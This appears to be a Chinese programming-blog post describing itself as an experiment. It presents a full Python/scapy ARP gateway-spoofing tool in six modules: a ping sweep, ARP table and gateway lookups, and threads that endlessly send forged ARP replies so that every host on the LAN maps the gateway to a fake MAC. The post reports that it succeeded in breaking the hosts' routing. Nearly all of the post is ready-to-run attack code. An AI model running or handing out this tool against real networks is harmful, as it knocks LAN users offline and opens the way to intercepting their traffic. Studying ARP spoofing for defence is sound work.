一、實(shí)驗(yàn)原理。
本次用代碼實(shí)現(xiàn)的是ARP網(wǎng)關(guān)欺騙,通過(guò)發(fā)送錯(cuò)誤的網(wǎng)關(guān)映射關(guān)系導(dǎo)致局域網(wǎng)內(nèi)其他主機(jī)無(wú)法正常路由。使用scapy中scapy.all模塊的ARP、sendp、Ether等函數(shù)完成包的封裝與發(fā)送。一個(gè)簡(jiǎn)單的ARP響應(yīng)報(bào)文發(fā)送:
eth = Ether(src=src_mac, dst=dst_mac)#賦值src_mac時(shí)需要注意,參數(shù)為字符串類型
arp = ARP(hwsrc=src_mac, psrc=src_ip, hwdst=dst_mac, pdst=dst_ip, op=2)#src為源,dst為目標(biāo),op=2為響應(yīng)報(bào)文、1為請(qǐng)求
pkt = eth / arp
endp(pkt)
因?yàn)閷?shí)驗(yàn)時(shí)發(fā)現(xiàn)主機(jī)并不會(huì)記錄來(lái)自網(wǎng)關(guān)的免費(fèi)ARP報(bào)文,無(wú)奈只有先想辦法把局域網(wǎng)內(nèi)存在的主機(jī)的IP-MAC映射關(guān)系拿到手,再逐個(gè)發(fā)送定向的ARP響應(yīng)報(bào)文。
二、運(yùn)行結(jié)果。
<1>先查看網(wǎng)關(guān),確保有網(wǎng):
<2>因?yàn)閟ocket需要sudo權(quán)限,所以以root權(quán)限跑起來(lái):
<3>因?yàn)榇a寫(xiě)的比較繁瑣,跑起來(lái)就比現(xiàn)場(chǎng)的工具慢很多,最后看下局域網(wǎng)內(nèi)主機(jī)的arp表:
網(wǎng)關(guān)172.16.0.254的MAC地址已經(jīng)從00:05:66:00:29:69變成01:02:03:04:05:06,成功!
三、實(shí)現(xiàn)代碼。
代碼過(guò)程:加載網(wǎng)關(guān)->掃描局域網(wǎng)內(nèi)主機(jī)->掃描完成->加載arp表->發(fā)送ARP響應(yīng)報(bào)文。
如圖,代碼分為六個(gè)部分。其中的arpATC.py為主程序,pingScanner.py為主機(jī)掃描器,arpThread.py為掃描線程,atcThread.py為發(fā)包線程,gtwaySearch.py獲取網(wǎng)關(guān),macSearch.py讀取本機(jī)arp表。
<1>pingScanner.py
通過(guò)os.popen函數(shù)調(diào)用ping,使用正則匹配返回字符串判斷目標(biāo)主機(jī)是否存在。
#!/usr/bin/python
'''
Using ping to scan
'''
import os
import re
import time
import thread
def host_scanner(ip):
p = os.popen('ping -c 2 '+ip)
string = p.read()
pattern = 'Destination Host Unreachable'
if re.search(pattern,string) is not None:
print '[*]From '+ip+':Destination Host Unreachable!'+time.asctime( time.localtime(time.time()) )
return False
else:
print '[-]From '+ip+':Recived 64 bytes!'+time.asctime( time.localtime(time.time()) )
return True
if __name__=='__main__':
print 'This script is only use as model,function:scanner(ip)!'
<2>macSearch.py
同樣,調(diào)用os.popen函數(shù)帶入?yún)?shù)'arp -a'查看本地緩存的arp表信息。通過(guò)正則表達(dá)式截取每個(gè)IP對(duì)應(yīng)的MAC地址,保存在字典arp_table里并返回。
#!/usr/bin/python
'''
Using re to get arp table
arp -a
? (192.168.43.1) at c0:ee:fb:d1:cd:ce [ether] on wlp4s0
'''
import re
import os
import time
def getMac(ip_table=[],arp_table={}):
#print '[-]Loading ARP table...'+time.asctime( time.localtime(time.time()) )
p = os.popen('arp -a')
string = p.read()
string = string.split('\n')
pattern = '(\d{1,3}.\d{1,3}.\d{1,3}.\d{1,3})(.\s*at\s*)([a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2}\:[a-z0-9]{2})'
length = len(string)
for i in range(length):
if string[i] == '':
continue
result = re.search(pattern, string[i])
if result is not None:
ip = result.group(1)
mac = result.group(3)
arp_table[ip]=mac
ip_table.append(ip)
#else:
#print '[*]macSearch.getMac:result is None'
#print '[-]ARP table ready!'+'<->'+time.asctime( time.localtime(time.time()) )
return (ip_table,arp_table)
if __name__=='__main__':
table = getMac()
ip_table = table[0]
arp_table = table[1]
for i in range(len(ip_table)):
ip = ip_table[i]
print '[-]'+ip+'<-is located on->'+arp_table[ip]
<3>gtwaySearch.py
通過(guò)使用正則截取os.popen('route -n')的返回值確定網(wǎng)關(guān)IP,把獲取的網(wǎng)關(guān)IP與MAC當(dāng)作元組返回。
#!/usr/bin/python
'''
'Kernel IP routing table\nDestination Gateway Genmask Flags Metric Ref Use Iface\n
0.0.0.0 172.16.0.254 0.0.0.0 UG 100 0 0 enp3s0f1\n
172.16.0.0 0.0.0.0 255.255.255.0 U 100 0 0 enp3s0f1\n'
'''
import re
import os
import time
from macSearch import *
def find_Gateway():
p = os.popen('route -n')
route_table = p.read()
pattern = '(0\.0\.0\.0)(\s+)((\d+\.){1,3}(\d+))(\s+)(0\.0\.0\.0)'
result = re.search(pattern, route_table)
if result is not None:
#print '[-]Gateway is located on:' + result.group(3)+'...'+time.asctime( time.localtime(time.time()) )
table = getMac()
ip = table[0][0]
mac = table[1][ip]
return (ip,mac)
else:
#print '[*]arpATC.find_Gateway:result is None!'
#print '[*]Gateway is no found!'
return
if __name__=='__main__':
print '[-]Looking for Gateway...'+time.asctime( time.localtime(time.time()) )
gateway = find_Gateway()
if gateway is not None:
print '[-]Gateway is located on:' + gateway[0]+'('+gateway[1]+')'+'...'+time.asctime( time.localtime(time.time()))
else:
print '[*]Gateway is no found!'+gateway[0]+time.asctime( time.localtime(time.time()) )
<4>arpThread.py
考慮到ping掃描主機(jī)時(shí)遇到不存在的主機(jī)會(huì)等待過(guò)長(zhǎng)的時(shí)間,使用多線程掃描就稍微會(huì)快一點(diǎn)。這里是通過(guò)繼承、重寫(xiě)run方法實(shí)現(xiàn)功能的。因?yàn)椴惶珪?huì)控制多線程,所以這里寫(xiě)死了,是四個(gè)線程平分255個(gè)可能存在的主機(jī)。
#/usr/bin/python
import threading
import time
from gtwaySearch import *
from macSearch import *
from pingScaner import *
class arpThread(threading.Thread):
def __init__(self,tag_ip,number):
super(arpThread,self).__init__()
self.tag_ip = tag_ip
self.number = number
self.status = False
def run(self):
add = 0
if (self.number-1)==0:
add = 1
start = (self.number-1)*64 + add
#1-63,64-127,128-191,192-256
end = start + 64
for i in range(start, end):
if i < 255:
host = self.tag_ip.split('.')
host[3] = str(i)
host = '.'.join(host)
host_scanner(host)
self.status=True
print '[-]Status of Thread_%d is '%self.number+str(self.status)
#print '[-]Scan completed!' + time.asctime(time.localtime(time.time()))
<5>atcThread.py
使用與arpThread.py中類似的方法繼承、重寫(xiě)run方法實(shí)現(xiàn)多線程發(fā)包的功能。發(fā)包時(shí)源IP是指定的字符串“01:02:03:04:05:06”,源IP為獲取的網(wǎng)關(guān)IP,目標(biāo)IP和目標(biāo)MAC皆為從本機(jī)arp表中獲取的真實(shí)存在的主機(jī)IP與MAC。
#!/usr/bin/python
import threading
from scapy.all import ARP,Ether,sendp,fuzz,send
class atcThread(threading.Thread):
def __init__(self,table,gtw_ip,gtw_mac):
super(atcThread,self).__init__()
self.table = table
self.gtw_ip = gtw_ip
self.gtw_mac = gtw_mac
def run(self):
ip_table = self.table[0]
arp_table = self.table[1]
while True:
for i in range(len(ip_table)):
tag_ip = ip_table[i]
tag_mac = arp_table[tag_ip]
eth = Ether(src=self.gtw_mac, dst=tag_mac)
arp = ARP(hwsrc='01:02:03:04:05:06', psrc=self.gtw_ip, hwdst=tag_mac, pdst=tag_ip, op=2)
pkt = eth / arp
sendp(pkt)
#pkt = eth/fuzz(arp)
#send(pkt,loop=1)
<6>arpATC.py
代碼的主程序,代碼過(guò)程:
加載網(wǎng)關(guān)->掃描局域網(wǎng)內(nèi)主機(jī)->掃描完成->加載arp表->發(fā)送ARP響應(yīng)報(bào)文->等待。
(四線程) (四線程)
因?yàn)橹鞒绦蚴撬姥h(huán),所以即便是攻擊完成后也不會(huì)退出。可以在arpThread啟動(dòng)前加入for循環(huán),這樣就能無(wú)限發(fā)送了。
#!/usr/bin/python
'''
'''
import os
from gtwaySearch import *
from arpThread import arpThread
from atcThread import atcThread
def atc_WrongGTW(gtw):
src_ip = gtw[0]
src_mac = gtw[1]
print '[-]Start scanning hosts...' + time.asctime(time.localtime(time.time()))
arpThread_1 = arpThread(src_ip,1)
arpThread_2 = arpThread(src_ip,2)
arpThread_3 = arpThread(src_ip,3)
arpThread_4 = arpThread(src_ip,4)
arpThread_1.start()
arpThread_2.start()
arpThread_3.start()
arpThread_4.start()
t = False
while(t==False):
t = arpThread_1.status and arpThread_2.status and arpThread_3.status and arpThread_4.status
time.sleep(5)
table = getMac()
print '[-]Scan completed!' + time.asctime(time.localtime(time.time()))
flag = raw_input('[-]Ready to start attacking:(y/n)')
while(True):
if flag in ['y', 'Y', 'n', 'N']:
break
print "[*]Plz enter 'y' or 'n'!"
flag = raw_input()
if flag in ['n','N']:
print '[*]Script stopped!'
else:
atcThread_1 = atcThread(table,src_ip,src_mac)
atcThread_2 = atcThread(table,src_ip, src_mac)
atcThread_3 = atcThread(table,src_ip, src_mac)
atcThread_4 = atcThread(table,src_ip, src_mac)
os.popen('arp -s %s %s'%(src_ip,src_mac))
print '[-]'+'arp -s %s %s'%(src_ip,src_mac)
print '[-]Strat attack...'
atcThread_1.start()
atcThread_2.start()
atcThread_3.start()
atcThread_4.start()
if __name__=='__main__':
gateway = find_Gateway()
if gateway is not None:
atc_WrongGTW(gateway)
while True:
pass
else:
print "[*]Can't find Gateway!"
以上這篇Python利用scapy實(shí)現(xiàn)ARP欺騙的方法就是小編分享給大家的全部?jī)?nèi)容了,希望能給大家一個(gè)參考,也希望大家多多支持腳本之家。
更多文章、技術(shù)交流、商務(wù)合作、聯(lián)系博主
微信掃碼或搜索:z360901061
微信掃一掃加我為好友
QQ號(hào)聯(lián)系: 360901061
您的支持是博主寫(xiě)作最大的動(dòng)力,如果您喜歡我的文章,感覺(jué)我的文章對(duì)您有幫助,請(qǐng)用微信掃描下面二維碼支持博主2元、5元、10元、20元等您想捐的金額吧,狠狠點(diǎn)擊下面給點(diǎn)支持吧,站長(zhǎng)非常感激您!手機(jī)微信長(zhǎng)按不能支付解決辦法:請(qǐng)將微信支付二維碼保存到相冊(cè),切換到微信,然后點(diǎn)擊微信右上角掃一掃功能,選擇支付二維碼完成支付。
【本文對(duì)您有幫助就好】元
